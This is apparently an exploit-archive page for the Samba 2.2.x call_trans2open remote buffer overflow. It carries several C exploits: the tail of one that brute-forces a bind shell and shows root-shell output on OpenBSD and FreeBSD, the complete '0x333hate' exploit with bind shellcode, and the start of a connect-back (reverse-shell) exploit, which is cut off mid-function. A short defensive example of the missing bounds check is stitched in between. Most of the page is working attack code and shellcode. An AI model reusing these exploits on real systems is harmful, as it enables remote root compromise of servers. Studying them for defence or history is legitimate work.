		0x00,0xd0,0x07,0x0c,0x00,0x00,0x00,0x00,
		0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xd0,
		0x07,0x43,0x00,0x0c,0x00,0x14,0x08,0x01,
		0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
		0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
		0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
		0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x90,
		0x00
	};
	char its_first_time_conn[]={
		0x00,0x00,0x00,0x2e,0xff,0x53,0x4d,0x42,
		0x73,0x00,0x00,0x00,0x00,0x08,0x01,0x00,
		0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
		0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
		0x64,0x00,0x01,0x00,0x00,0xff,0x00,0x00,
		0x00,0x00,0x20,0x02,0x00,0x01,0x00,0x00,
		0x00,0x00
	};
	char its_second_time_conn[]={
		0x00,0x00,0x00,0x3c,0xff,0x53,0x4d,0x42,
		0x70,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
		0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
		0x00,0x00,0x00,0x00,0x00,0x00,0x0c,0x20,
		0x64,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
		0x5c,0x5c,0x69,0x70,0x63,0x24,0x25,0x6e,
		0x6f,0x62,0x6f,0x64,0x79,0x00,0x00,0x00,
		0x00,0x00,0x00,0x00,0x49,0x50,0x43,0x24
	};
	int first_packet_len=sizeof(its_first_time_conn);
	int second_packet_len=sizeof(its_second_time_conn);

	memset((char *)atk_buf,0,sizeof(atk_buf));
	memcpy(atk_buf,its_first_time_conn,sizeof(its_first_time_conn));
	send(sock,atk_buf,first_packet_len,0);
	recv(sock,atk_buf,sizeof(atk_buf)-1,0);

	memset((char *)atk_buf,0,sizeof(atk_buf));
	memcpy(atk_buf,its_second_time_conn,sizeof(its_second_time_conn));
	send(sock,atk_buf,second_packet_len,0);
	recv(sock,atk_buf,sizeof(atk_buf)-1,0);

	memset((char *)atk_buf,0,sizeof(atk_buf));
	memcpy(atk_buf+atk_buf_pos,its_exploit_packet,sizeof(its_exploit_packet));
	atk_buf_pos+=sizeof(its_exploit_packet);

	memset(atk_buf+atk_buf_pos,DF_NOP,((__BUF_LEN-__LEN_PAD)-strlen(shellcode)-atk_buf_pos));
	atk_buf_pos+=((__BUF_LEN-__LEN_PAD)-strlen(shellcode)-atk_buf_pos);

	memcpy(atk_buf+atk_buf_pos,shellcode,strlen(shellcode));
	atk_buf_pos+=strlen(shellcode);

	memset(atk_buf+atk_buf_pos,DF_NOP,__LEN_PAD);
	atk_buf_pos+=(__LEN_PAD);
#ifdef __DEBUG
	sleep(10);
#endif
	{
		*(long *)&atk_buf[atk_buf_pos]=(shell-(0x82*2));// fake fp
		atk_buf_pos+=4;
		*(long *)&atk_buf[atk_buf_pos]=(shell);// retaddr;
		atk_buf_pos+=4;
		*(long *)&atk_buf[atk_buf_pos]=(shell-(0x82*2));// fake fp
		atk_buf_pos+=4;
	}
	send(sock,atk_buf,sizeof(atk_buf)-1,0);
}

int main(int argc,char *argv[])
{
	int sock,whtl,type=0,brute_f=0;
	char tg_host[0x82]="localhost";
	u_long shell=plat[type].shell;
	
	(void)banrl();
	if(argc<2)
	{
		(void)usage(argv[0]);
	}
	
	while((whtl=getopt(argc,argv,"H:h:S:s:T:t:IiB:b"))!=-1)
	{
		extern char *optarg;
		switch(whtl)
		{
			case 'H':
			case 'h':
				memset((char *)tg_host,0,sizeof(tg_host));
				strncpy(tg_host,optarg,sizeof(tg_host)-1);
				break;
				
			case 'S':
			case 's':
				shell=strtoul(optarg,0,0);
				break;
				
			case 'T':
			case 't':
				if((type=atoi(optarg))>1)
				{
					(void)usage(argv[0]);
				}
				else shell=plat[type].shell;
				break;
				
			case 'I':
			case 'i':
				(void)usage(argv[0]);
				break;
				
			case 'B':
			case 'b':
				brute_f++;
				break;
				
			case '?':
				fprintf(stderr," Try `%s -i' for more information.\n\n",argv[0]);
				exit(-1);
				break;
		}
	}
	if(brute_f)
	{
		fprintf(stdout," **\n ** OK, It's good selection, Attack tries %d times.\n",BRUTE_AT);
		fprintf(stdout," ** If work process is boring, drink coffee and wait. hehe ;-D\n **\n\n");
		fprintf(stdout," [*] Brute-Force mode:\n\n");
		fprintf(stdout," |----+----+----+----+----+----+----+----+----+----+----+----+----|");
		fprintf(stdout,"\n |");

		for(brute_f=0;brute_f<BRUTE_AT;brute_f++)
		{
			fflush(stdout);
			fprintf(stdout,"=");

			shell+=(0x100);
			sock=(int)setsock(tg_host,ATK_PORT);
			
			if((int)re_connt(sock,0)==-1)
			{
				while(!(brute_f>=BRUTE_AT-1))
				{
					fprintf(stdout,"=");
					brute_f++;
				}
				fprintf(stdout,"|\n\n");
				fprintf(stderr," [-] Connect Failed.\n\n");
				exit(-1);
			}
			
			__atk_code_send_recv(sock,shell);
			close(sock);
			sleep(2);
			sock=(int)setsock(tg_host,SH_PORT);
			
			if((int)re_connt(sock,0)==-1)
			{
				continue;
			}
			
			while(!(brute_f>=BRUTE_AT-1))
			{
				fprintf(stdout,"=");
				brute_f++;
			}
			
			fprintf(stdout,"|\n\n");
			fprintf(stdout," [+] Shellcode address: %p\n",shell);
			fprintf(stdout," [*] Brute-Force end !!\n\n");
			fprintf(stdout," **\n ** Bind shellcode is port 10000.\n");
			fprintf(stdout," ** If bindshell port number was changed, change connection port.\n **\n\n");
			
			(void)send_recv_sh(sock);
		}

		fprintf(stdout,"|\n\n **\n");
		fprintf(stdout," ** Brute-Force exploit failed. Reason is simple.\n **\n");
		fprintf(stdout," ** Could not search shellcode's position during %d times.\n",BRUTE_AT);
		fprintf(stdout," ** Or, Operating System's target that we attack isn't.\n");
		fprintf(stdout," ** OOops ! is server Samba version doubtful ??\n **\n\n");
		exit(-1);
	}
	else
	{
		fprintf(stdout," [0] Target: %s\n",plat[type].ost);
		fprintf(stdout," [1] Set socket.\n");
		sock=(int)setsock(tg_host,ATK_PORT);
		(int)re_connt(sock,1);
		
		fprintf(stdout," [2] Make shellcode & Send Packet.\n");
		__atk_code_send_recv(sock,shell);
		close(sock);
		
		fprintf(stdout," [3] Trying %s:%d.\n",tg_host,SH_PORT);
		sleep(2);
		
		sock=(int)setsock(tg_host,SH_PORT);
		(int)re_connt(sock,1);
		
		fprintf(stdout," [*] Connected to %s:%d.\n",tg_host,SH_PORT);
		(void)send_recv_sh(sock);
	}
}

int setsock(char *hostip,int port)
{
	int sock;
	struct hostent *he;
	struct sockaddr_in x82;

	if((he=gethostbyname(hostip))==NULL)
	{
		return(-1);
	}

	if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==-1)
	{
		return(-1);
	}

	x82.sin_family=AF_INET;
	x82.sin_port=htons(port);
	x82.sin_addr=*((struct in_addr *)he->h_addr);
	memset(&(x82.sin_zero),0,8);

	if(connect(sock,(struct sockaddr *)&x82,sizeof(struct sockaddr))==-1)
	{
		return(-1);
	}
	return(sock);
}

int re_connt(int sock,int type)
{
	if(sock==-1)
	{
		if(type)
		{
			fprintf(stderr," [-] Connect Failed.\n\n");
			exit(-1);
		}
		else return(-1);
	}
}

void send_recv_sh(int sock)
{
	int pk;
	struct timeval tm;
	char *t_cmd="su -l\n";
	char *n_cmd="uname -a;id;exec sh -i\n";
	char rbuf[1024];
	fd_set rset;
	memset((char *)rbuf,0,sizeof(rbuf));
	fprintf(stdout," [*] Executed shell successfully !\n");
	fprintf(stdout," [*] Command: # su -l; uname -a; id; exec sh -i\n\n");
	send(sock,t_cmd,strlen(t_cmd),0);
	send(sock,n_cmd,strlen(n_cmd),0);

	tm.tv_sec=10;
	tm.tv_usec=0;
	
	while(1)
	{
		fflush(stdout);
		FD_ZERO(&rset);
		FD_SET(sock,&rset);
		FD_SET(STDIN_FILENO,&rset);

		select(sock+1,&rset,NULL,NULL,&tm);

		if(FD_ISSET(sock,&rset))
		{
			pk=read(sock,rbuf,sizeof(rbuf)-1);
			if(pk<=0)
			{
				fprintf(stdout," [*] Happy-Exploit\n\n");
				close(sock);
				exit(0);
			}
			rbuf[pk]=0;
			fprintf(stdout,"%s",rbuf);
		}
		if(FD_ISSET(STDIN_FILENO,&rset))
		{
			pk=read(STDIN_FILENO,rbuf,sizeof(rbuf)-1);
			if(pk>0)
			{
				rbuf[pk]=0;
				write(sock,rbuf,pk);
			}
		}
	}
	return;
}

void banrl()
{
	fprintf(stdout,"\n Samba v2.2.x call_trans2open() Remote Overrun exploit for XxxxBSD\n");
	fprintf(stdout,"                                                     by Xpl017Elz.\n\n");
}

void usage(char *p_name)
{
	int r_s=0;
	fprintf(stdout," Usage: %s -option [argument]\n",p_name);
	fprintf(stdout,"\n\t-h - hostname. (default: localhost)\n");
	fprintf(stdout,"\t-s - shellcode. (select target)\n");
	fprintf(stdout,"\t-t - target number.\n");
	fprintf(stdout,"\t-b - auto brute-force attack mode.\n");
	fprintf(stdout,"\t-i - help information.\n\n");
	fprintf(stdout," Select target number:\n\n");
	
	for(;;)
	{
		if(plat[r_s].ost==NULL)
			break;
		else fprintf(stdout,"\t{%d} %s\n",plat[r_s].num,plat[r_s].ost);
		r_s++;
	}
	fprintf(stdout,"\n Example> %s -hlocalhost -s 0x82828282\n\n",p_name);
	exit(-1);
}

/*
**
** OpenBSD exploit:
** --
** bash$ ./0x82-Remote.54AAb4.xpl -h 61.37.xxx.xx -t1
**
**  Samba v2.2.x call_trans2open() Remote Overrun exploit for XxxxBSD
**                                                      by Xpl017Elz.
**
**  [0] Target: OpenBSD 3.0 GENERIC#94 i386, Samba v2.2.x
**  [1] Set socket.
**  [2] Make shellcode & Send Packet.
**  [3] Trying 61.37.xxx.xx:10000.
**  [*] Connected to 61.37.xxx.xx:10000.
**  [*] Executed shell successfully !
**  [*] Command: # su -l; uname -a; id; exec sh -i
**
** tset: standard error: Operation not supported
** OpenBSD testsub 3.0 GENERIC#94 i386
** uid=0(root) gid=0(wheel) groups=0(wheel), 2(kmem), 3(sys), 4(tty), 5(operator), 20(staff), 31(guest)
** sh: No controlling tty (open /dev/tty: Device not configured)
** sh: Can't find tty file descriptor
** sh: warning: won't have full job control
** #
** --
**
** FreeBSD exploit:
** --
** bash$ ./0x82-Remote.54AAb4.xpl -h 61.37.xxx.xx -t0
**
**  Samba v2.2.x call_trans2open() Remote Overrun exploit for XxxxBSD
**                                                      by Xpl017Elz.
**
**  [0] Target: FreeBSD 4.6.2-RELEASE #0 i386, Samba v2.2.x
**  [1] Set socket.
**  [2] Make shellcode & Send Packet.
**  [3] Trying 61.37.xxx.xx:10000.
**  [*] Connected to 61.37.xxx.xx:10000.
**  [*] Executed shell successfully !
**  [*] Command: # su -l; uname -a; id; exec sh -i
**
** Warning: no access to tty (Bad file descriptor).
** Thus no job control in this shell.
** FreeBSD localhost 4.6.2-RELEASE FreeBSD 4.6.2-RELEASE #0: Wed Aug 14 21:23:26 GMT 2002     
** murray@builder.freebsdmall.com:/usr/src/sys/compile/GENERIC  i386
** uid=0(root) gid=0(wheel) groups=0(wheel), 2(kmem), 3(sys), 4(tty), 5(operator), 20(staff), 31(guest)
** sh: can't access tty; job control turned off
** #
** --
**
*/
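The two trans2.c lines quoted in the exploit header above, `namelen = strlen(pname)+1;` and `StrnCpy(fname,pname,namelen);`, take the copy bound from the client-supplied string itself, so any name of 1024 bytes or more runs past the 1024-byte `pstring`. The C below is an added illustration written for this page; it is not Samba's source and not the fix shipped in 2.2.8a. It models `strn_cpy` on Samba's `StrnCpy` helper and places the unchecked copy beside a checked version that refuses a name which is not NUL-terminated inside the received parameter block or does not fit in the `pstring` together with its terminator. The 28-byte offset of the file name inside the TRANS2_OPEN2 parameter block comes from the SMB request layout; `build_params` and `check_case` and their 'A'-filled inputs are constructed test data, not anything observed on a real server.

```c
#include <stdio.h>
#include <string.h>

/* Added illustration, not Samba's code: the bounds check that the
 * call_trans2open() filename copy quoted on this page lacked. */

#define PSTRING_LEN 1024                 /* source/include/smb.h, as quoted above */
typedef char pstring[PSTRING_LEN];
#define T2OPEN_NAME_OFF 28               /* FileName offset inside TRANS2_OPEN2 params */

/* Modelled on Samba's StrnCpy(): copies at most n bytes, then writes a NUL.
 * It always writes dest[n], so the caller must guarantee n < sizeof dest. */
static char *strn_cpy(char *dest, const char *src, size_t n)
{
    char *d = dest;
    while (n-- && (*d++ = *src++))
        ;
    *d = '\0';
    return dest;
}

/* The vulnerable shape, as quoted from trans2.c lines 250-252: the bound is
 * taken from the attacker-controlled string, so a name of PSTRING_LEN bytes
 * or more writes past fname. Kept only for contrast; never called here. */
void trans2open_name_unchecked(const char *pname, pstring fname)
{
    short namelen = (short)(strlen(pname) + 1);   /* int16 namelen in the original */
    strn_cpy(fname, pname, namelen);
}

/* Hardened form: the name must be NUL-terminated inside the parameter block
 * the client actually sent, and must fit in a pstring with its NUL.
 * Returns 0 and fills fname on success, -1 on any violation. */
int trans2open_name_checked(const unsigned char *params, size_t total_params,
                            pstring fname)
{
    if (total_params <= T2OPEN_NAME_OFF)
        return -1;                                  /* no room for a name at all */
    const char *pname = (const char *)params + T2OPEN_NAME_OFF;
    size_t avail = total_params - T2OPEN_NAME_OFF;
    const char *nul = memchr(pname, '\0', avail);   /* bounded scan; strlen() is not */
    if (nul == NULL)
        return -1;                                  /* unterminated within the block */
    size_t namelen = (size_t)(nul - pname);
    if (namelen >= PSTRING_LEN)
        return -1;                                  /* would overflow fname */
    strn_cpy(fname, pname, namelen);
    return 0;
}

/* Constructed TRANS2_OPEN2 parameter block: 28 zeroed fixed-field bytes,
 * then name_len bytes of 'A' and, optionally, a terminating NUL.
 * Returns the block length written, or 0 if buf is too small. */
size_t build_params(unsigned char *buf, size_t bufsz, size_t name_len, int terminate)
{
    size_t need = T2OPEN_NAME_OFF + name_len + (terminate ? 1 : 0);
    if (need > bufsz)
        return 0;
    memset(buf, 0, T2OPEN_NAME_OFF);
    memset(buf + T2OPEN_NAME_OFF, 'A', name_len);
    if (terminate)
        buf[T2OPEN_NAME_OFF + name_len] = '\0';
    return need;
}

/* Runs the checked copy over one constructed case and returns its verdict
 * (0 accepted, -1 rejected, -2 if the case could not be built). */
int check_case(size_t name_len, int terminate)
{
    static unsigned char params[4096];
    pstring fname;
    size_t n = build_params(params, sizeof params, name_len, terminate);
    return n ? trans2open_name_checked(params, n, fname) : -2;
}

int main(void)
{
    printf("20-byte name:       %d\n", check_case(20, 1));    /* 0, accepted */
    printf("1023-byte name:     %d\n", check_case(1023, 1));  /* 0, largest that fits */
    printf("1100-byte name:     %d\n", check_case(1100, 1));  /* -1, rejected */
    printf("unterminated name:  %d\n", check_case(20, 0));    /* -1, rejected */
    return 0;
}
```

Compile with any C99 compiler (`cc -Wall trans2open_check.c`) and run it; the four lines show the verdicts. The design point is that the bound passed to the copy is derived from the receive buffer (`total_params`) and the destination size (`PSTRING_LEN`), never from the content being copied, and that the terminator search uses `memchr` over the buffer rather than `strlen`, which would itself read past an unterminated block.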

- Vulnerability information (22469)

Samba 2.2.x 'call_trans2open' Remote Buffer Overflow Vulnerability (2) (EDBID:22469)
unix remote
2003-04-07 Verified
0 c0wboy
source: http://www.securityfocus.com/bid/7294/info
 
A buffer overflow vulnerability has been reported for Samba. The problem occurs when copying user-supplied data into a static buffer. By passing excessive data to an affected Samba server, it may be possible for an anonymous user to corrupt sensitive locations in memory.
 
Successful exploitation of this issue could allow an attacker to execute arbitrary commands, with the privileges of the Samba process.
 
It should be noted that this vulnerability affects Samba 2.2.8 and earlier. Samba-TNG 0.3.1 and earlier are also affected. 

/*  0x333hate => samba 2.2.x remote root exploit
 *
 *  generic linux x86 samba remote root
 *  exploit, based on trans2root.pl
 *
 *  coded by c0wboy
 *
 *  ~ www.0x333.org ~
 */

#include <stdio.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netdb.h>
#include <string.h>

#define fatal(x...) { fprintf (stderr, ##x); exit(-333); }

#define BUFFER 1500
#define SHELL  5074
#define PORT   139
#define NOP    0x90
#define START  0xbfffffff
#define STOP   0xbf000000
#define OFFSET 512

typedef enum {FALSE,TRUE} BOOLEAN;


unsigned char setup1[] =
         "\x00\x00\x00\x2e\xff\x53\x4d\x42\x73\x00\x00\x00\x00"
         "\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
         "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\x00"
         "\x00\x00\x00\x20\x02\x00\x01\x00\x00\x00\x00";

unsigned char setup2[] =
         "\x00\x00\x00\x3c\xff\x53\x4d\x42\x70\x00\x00\x00\x00"
         "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
         "\x00\x00\x64\x00\x00\x00\x64\x00\x00\x00\x00\x00\x00"
         "\x00\x5c\x5c\x69\x70\x63\x24\x25\x6e\x6f\x62\x6f\x64"
         "\x79\x00\x00\x00\x00\x00\x00\x00\x49\x50\x43\x24";

unsigned char overflow[] =
         "\x00\x04\x08\x20\xff\x53\x4d\x42\x32\x00\x00\x00\x00"
         "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
         "\x00\x00\x01\x00\x00\x00\x64\x00\x00\x00\x00\xd0\x07"
         "\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00\x00\x00\x00\x00"
         "\x00\x00\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01\x00"
         "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
         "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
         "\x00\x00\x00\x00\x90";

unsigned char shellcode[] =
         "\x31\xc0\x50\x40\x89\xc3\x50\x40\x50\x89\xe1\xb0\x66"
         "\xcd\x80\x31\xd2\x52\x66\x68\x13\xd2\x43\x66\x53\x89"
         "\xe1\x6a\x10\x51\x50\x89\xe1\xb0\x66\xcd\x80\x40\x89"
         "\x44\x24\x04\x43\x43\xb0\x66\xcd\x80\x83\xc4\x0c\x52"
         "\x52\x43\xb0\x66\xcd\x80\x93\x89\xd1\xb0\x3f\xcd\x80"
         "\x41\x80\xf9\x03\x75\xf6\x52\x68\x6e\x2f\x73\x68\x68"
         "\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd"
         "\x80";

int main (int argc, char *[]);
void usage (char *);
void hate (unsigned long);
void exploit (void);
BOOLEAN connection(char *, int);
int owned (int);

char buffer[BUFFER];
char zero[808] = "";
char * target=NULL;
int port = PORT;

struct sockaddr_in temp;
struct hostent *h;
int fdsocket;

void
usage (char * prg)
{
   fprintf (stderr, "\n [~] 0x333hate => samba 2.2.x remote root exploit [~]\n");
   fprintf (stderr, " [~]        coded by c0wboy ~ www.0x333.org       [~]\n\n");
   fprintf (stderr, " Usage : %s [-t target] [-p port] [-h]\n\n", prg);
   fprintf (stderr, " \t-t\ttarget to attack\n");
   fprintf (stderr, " \t-p\tsamba port (default 139)\n");
   fprintf (stderr, " \t-h\tdisplay this help\n\n");

   exit(-333);
}

void
hate (unsigned long ret)
{
   int i;
   char *ptr=buffer;

   bzero(buffer, BUFFER);

   memcpy ((char *)ptr, overflow, 96);

   ptr += 96;
   memset ((char *)ptr, NOP, (772+36));

   ptr += (772+36);
   memcpy ((char *)ptr, shellcode, strlen (shellcode));

   ptr += strlen (shellcode);
   memset ((char *)ptr, NOP, (87+44));

   ptr += (87+44);

   for (i = 1127 ; i < 1159 ; i += 4)
      *(long *) &buffer[i] = ret;
}

void
exploit (void)
{
   BOOLEAN status;
   char outside[333];

   if(!(status = connection (target, port)))
      fatal (" [~] Error in connection\n");

   /* here we setup connection */
   if (send (fdsocket, setup1, sizeof (setup1)-1, 0) < 0)
      fatal (" [~] Error in setup (1) connection\n");
   recv (fdsocket, outside, sizeof (outside)-1, 0);

   if (send (fdsocket, setup2, sizeof (setup2)-1, 0) < 0)
      fatal (" [~] Error in setup (2) connection\n");
   recv (fdsocket, outside, sizeof (outside)-1, 0);

   /* exploiting samba */
   if (send (fdsocket, buffer, sizeof (buffer)-1, 0) < 0)
      fatal (" [~] Error in exploiting samba\n");

   if (send (fdsocket, zero, sizeof (zero)-1, 0) < 0)
      fatal (" [~] Error in exploiting samba\n");

   close (fdsocket);

   if((status = connection (target, SHELL)))
   {
      owned (fdsocket);
      close (fdsocket);
   }
}

BOOLEAN
connection (char *host, int port)
{
   BOOLEAN status = TRUE;

   temp.sin_family = AF_INET;
   temp.sin_port = htons (port);
   h = gethostbyname (host);
      
   if (h == 0)
      status = FALSE;
   else 
   {
      bcopy (h->h_addr,&temp.sin_addr,h->h_length);

      if ((fdsocket = socket (AF_INET,SOCK_STREAM,0)) < 0)
         status = FALSE;
      else
         if ((connect (fdsocket, (struct sockaddr*) &temp, sizeof (temp))) < 0)
            status = FALSE;
   }
   return status;
}

int 
owned (int fdsocket)
{
   fd_set cya;
   char outside[1024], *cmd="uname -a;id;\n";
   int x;

   FD_ZERO (&cya);
   FD_SET (fdsocket, &cya);
   FD_SET (0, &cya);

   send (fdsocket, cmd, strlen (cmd), 0);

   for(;;)
   {
      FD_SET (fdsocket, &cya);
      FD_SET (0, &cya);

      if (select (FD_SETSIZE, &cya, NULL, NULL, NULL) < 0)
         break;

      if (FD_ISSET (fdsocket, &cya))
      {
         if ((x = recv (fdsocket, outside, sizeof (outside)-1, 0)) < 0)
            fatal (" [-] cya\n");

         if (write (1, outside, x) < 0)
            break;
      }

      if (FD_ISSET (0, &cya))
      {
         if ((x = read (0, outside, sizeof (outside)-1)) < 0)
         fatal ("[-] cya\n");

         if (send (fdsocket, outside, x, 0) < 0)
            break;
      }

      usleep(10);
   }

   fprintf (stderr, " [-] cya hax0r\n");
   exit(0);
}


int
main (int argc, char * argv[])
{
   int c;
   unsigned long ret;

   while((c=getopt (argc, argv, "ht:p:")) != EOF)
   {
      switch(c)
      {
         case 't': target = optarg; break;
         case 'p': port = atoi (optarg); break;
         case 'h': usage (argv[0]);
         default : usage (argv[0]);
      }
   }

   if (argc==1 || target == NULL)
      usage (argv[0]);

   fprintf (stdout, "\n [~] 0x333hate => samba 2.2.x remote root exploit [~]\n");
   fprintf (stdout, " [~]        coded by c0wboy ~ www.0x333.org       [~]\n\n");

   fprintf (stdout, " [-] connecting to %s:%d\n", target, port);
   fprintf (stdout, " [-] starting bruteforce\n\n");

   for (ret=START; ret>=STOP; ret-=OFFSET)
   {
      fprintf (stdout, " [-] testing 0x%x\n", ret);
      hate (ret);
      exploit ();
   }
   fprintf (stdout, " [-] uhm ... maybe samba is not vulnerable !\n");
   return 0;
}


		

- Vulnerability information (22470)

Samba 2.2.x 'call_trans2open' Remote Buffer Overflow Vulnerability (3) (EDBID:22470)
unix remote
2003-05-12 Verified
0 eDSee
N/A
source: http://www.securityfocus.com/bid/7294/info
  
A buffer overflow vulnerability has been reported for Samba. The problem occurs when copying user-supplied data into a static buffer. By passing excessive data to an affected Samba server, it may be possible for an anonymous user to corrupt sensitive locations in memory.
  
Successful exploitation of this issue could allow an attacker to execute arbitrary commands, with the privileges of the Samba process.
  
It should be noted that this vulnerability affects Samba 2.2.8 and earlier. Samba-TNG 0.3.1 and earlier are also affected. 

/*
 *  Samba Remote Root Exploit by Schizoprenic from Xnuxer-Labs, 2003.
 *  Using connect back method and brute force mode.
 *  I just create & modify some code and ripped too :P 
 *  Created on May 12th, 2003
 *
 *  Thanks to eDSee (netric.org), Sambal is nice exploit bro...
 *  References: trans2root.pl, 0x333hate.c, sambal.c
 *  This code is just for education purposes
 *
 *  XNUXER RESEARCH LABORATORY
 *  Official Site: http://infosekuriti.com
 *  Contact Email: xnuxer@yahoo.com, xnuxer@hackermail.com
 */

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <netdb.h>
#include <errno.h>
#include <fcntl.h>
#include <signal.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>
#include <sys/select.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/wait.h>
#include <netinet/in.h>
#include <arpa/inet.h>

char
linux_connect_back[] =
    /* fork(), execve sh -c [client] [host to bounce to], term=xterm */
    "\x31\xc0\x31\xff\xb0\x02\xcd\x80\x39\xc7\x74\x7e\x31\xc0\x50"
    "\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20"
    "\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20"
    "\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20"
    "\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20\x89\xe1\x50\x66\x68"
    "\x2d\x63\x89\xe3\x50\x66\x68\x73\x68\x89\xe0\x57\x51\x53\x50"
    "\x89\xe1\x31\xc0\x50\x66\x68\x72\x6d\x68\x3d\x78\x74\x65\x68"
    "\x54\x45\x52\x4d\x89\xe2\x50\x52\x89\xe2\x57\x68\x6e\x2f\x73"
    "\x68\x68\x2f\x2f\x62\x69\x89\xe3\xb0\x0b\xcd\x80\x31\xc0\xb0"
    "\x01\xcd\x80"

    /* connect back shellcode (port=0xb0ef) */
    "\x31\xc0\x31\xdb\x31\xc9\x51\xb1\x06\x51\xb1\x01\x51\xb1\x02\x51"
    "\x89\xe1\xb3\x01\xb0\x66\xcd\x80\x89\xc2\x31\xc0\x31\xc9\x51\x51"
    "\x68\x41\x42\x43\x44\x66\x68\xb0\xef\xb1\x02\x66\x51\x89\xe7\xb3"
    "\x10\x53\x57\x52\x89\xe1\xb3\x03\xb0\x66\xcd\x80\x31\xc9\x39\xc1"
    "\x74\x06\x31\xc0\xb0\x01\xcd\x80\x31\xc0\xb0\x3f\x89\xd3\xcd\x80"
    "\x31\xc0\xb0\x3f\x89\xd3\xb1\x01\xcd\x80\x31\xc0\xb0\x3f\x89\xd3"
    "\xb1\x02\xcd\x80\x31\xc0\x31\xd2\x50\x68\x6e\x2f\x73\x68\x68\x2f"
    "\x2f\x62\x69\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80\x31\xc0\xb0"
    "\x01\xcd\x80";

char
bsd_connect_back[] =
    /* fork(), execve sh -c [client] [host to bounce to], term=xterm */
    "\x31\xc0\x31\xff\xb0\x02\xcd\x80\x39\xc7\x74\x7e\x31\xc0\x50"
    "\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20"
    "\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20"
    "\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20"
    "\x68\x20\x20\x20\x20\x89\xe1\x50\x66\x68\x2d\x63\x89\xe3\x50"
    "\x66\x68\x73\x68\x89\xe0\x57\x51\x53\x50\x89\xe1\x31\xc0\x50"
    "\x66\x68\x72\x6d\x68\x3d\x78\x74\x65\x68\x54\x45\x52\x4d\x89"
    "\xe2\x50\x52\x89\xe2\x57\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62"
    "\x69\x89\xe3\x50\x52\x51\x53\x50\xb0\x3b\xcd\x80\x31\xc0\xb0"
    "\x01\xcd\x80"

    /* connect back shellcode (port=0xb0ef) */
    "\x31\xc0\x31\xdb\x53\xb3\x06\x53\xb3\x01\x53\xb3\x02\x53\x54\xb0"
    "\x61\xcd\x80\x31\xd2\x52\x52\x68\x41\x41\x41\x41\x66\x68\xb0\xef"
    "\xb7\x02\x66\x53\x89\xe1\xb2\x10\x52\x51\x50\x52\x89\xc2\x31\xc0"
    "\xb0\x62\xcd\x80\x31\xdb\x39\xc3\x74\x06\x31\xc0\xb0\x01\xcd\x80"
    "\x31\xc0\x50\x52\x50\xb0\x5a\xcd\x80\x31\xc0\x31\xdb\x43\x53\x52"
    "\x50\xb0\x5a\xcd\x80\x31\xc0\x43\x53\x52\x50\xb0\x5a\xcd\x80\x31"
    "\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54"
    "\x53\x50\xb0\x3b\xcd\x80\x31\xc0\xb0\x01\xcd\x80";

typedef struct {
	unsigned char type;
	unsigned char flags;
	unsigned short length;
} NETBIOS_HEADER;

typedef struct {
	unsigned char protocol[4];
	unsigned char command;
	unsigned short status;
	unsigned char reserved;
	unsigned char  flags;
	unsigned short flags2;
	unsigned char  pad[12];
	unsigned short tid;
	unsigned short pid;
	unsigned short uid;
	unsigned short mid;
} SMB_HEADER;

pid_t childs[50];
int LOOP = 1;
struct sockaddr_in serv_addr;
int sock_listen, client;
int exploit_pid;
int listen_pid;
int port_listen = 45295;

void 
usage(char *prog) 
{
int i;

   fprintf(stdout, "Samba < 2.2.8 Remote Root exploit by Schizoprenic\n"
                   "Connect back method, Xnuxer-Labs, 2003.\n"
                   "Usage  : %s <type> <victim> <your_ip>\n"
                   "Targets:\n"
                   "         0 = Linux\n"
                   "         1 = FreeBSD/NetBSD\n"
                   "         2 = OpenBSD 3.0 and prior\n"
                   "         3 = OpenBSD 3.2 - non-exec stack\n\n", prog);      
   exit(1);
}

int 
Connect(int fd, char *ip, unsigned int port, unsigned int time_out) 
{
	/* ripped from no1 */

	int                      flags;
	int                      select_status;
	fd_set                   connect_read, connect_write;
	struct timeval           timeout;
	int                      getsockopt_length = 0;
	int                      getsockopt_error = 0;
	struct sockaddr_in       server;
	bzero(&server, sizeof(server));
	server.sin_family = AF_INET;
	inet_pton(AF_INET, ip, &server.sin_addr);
	server.sin_port = htons(port);

	if((flags = fcntl(fd, F_GETFL, 0)) < 0) {
		close(fd);
    		return -1;
  	}
  
